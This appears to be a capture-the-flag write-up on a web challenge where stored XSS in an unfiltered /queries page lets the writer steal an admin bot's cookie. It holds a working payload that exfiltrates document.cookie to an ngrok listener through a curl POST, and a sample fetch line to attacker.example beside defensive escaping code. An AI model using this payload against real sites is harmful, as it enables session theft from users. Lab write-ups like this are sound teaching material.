Not much information is available on the website, because it only shows some animation.
It has a downloadable file, so let's analyze it.
We get two endpoints there. /api/submit
is used to add a new query, and /queries
is used to show all queries from the database, but it can only be accessed from localhost.
There is also a bot that visits the /queries
page with a cookie that we need to steal, since we can see the flag there.
Now let's take a look at the /queries
page.
The queries
page just shows all queries from the database without any filtering or output encoding, so we can inject XSS and steal the admin cookie.
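To make the root cause concrete, here is an added example (not code from the challenge or the writeup) of what the /queries rendering looks like with and without output encoding, plus the cookie attributes that would have kept document.cookie out of reach even if a script did run. The function names (renderQueriesPageUnsafe, renderQueriesPage, escapeHtml, sessionCookie) and the sample queries are assumptions constructed for the example.

```javascript
// Added example, not the challenge's own code: rendering stored queries safely.
// Function names and sample data are assumptions constructed for illustration.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that can break out of an HTML text node or attribute.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable rendering: the stored query is interpolated straight into the page,
// which is the behaviour the writeup exploits.
function renderQueriesPageUnsafe(queries) {
  return '<ul>' + queries.map((q) => `<li>${q}</li>`).join('') + '</ul>';
}

// Hardened rendering: every query is escaped before it reaches the HTML, so a
// stored <script> tag is displayed as text instead of executed by the bot's browser.
function renderQueriesPage(queries) {
  return '<ul>' + queries.map((q) => `<li>${escapeHtml(q)}</li>`).join('') + '</ul>';
}

// Session cookie attributes: HttpOnly keeps the value out of document.cookie,
// so even an XSS that slips through cannot read it the way the writeup's payload does.
function sessionCookie(value) {
  return `session=${encodeURIComponent(value)}; HttpOnly; Secure; SameSite=Strict; Path=/`;
}

// Constructed sample data: one harmless query and one in the shape of the writeup's payload.
const SAMPLE_QUERIES = [
  'how do I reset my password?',
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
];

// Detection helper: does the rendered HTML still contain a live script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log('unsafe:', renderQueriesPageUnsafe(SAMPLE_QUERIES));
console.log('safe:  ', renderQueriesPage(SAMPLE_QUERIES));
console.log('cookie:', sessionCookie('example-session-id'));
```

Running it prints the unsafe page with a real script element and the safe page with the same payload rendered as visible text; the same escapeHtml step applied at render time is the one fix that would have closed this challenge.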
First, we need to start an HTTP server. I use Python and then forward the port with ngrok, since the website uses a public IP and I don't have one.
#Terminal 1
python3 -m http.server 80
#Terminal 2
ngrok http 80
#Terminal 3
curl -X POST http://Target-IP:Target-Port/api/submit -H "Content-Type: application/json" --data-raw '{"query" : "<script>const cookie = document.cookie; const xhttp = new XMLHttpRequest(); xhttp.open(\"GET\", `Your-Ngrok-Address?cookie=${cookie}`, true); xhttp.send();</script>"}'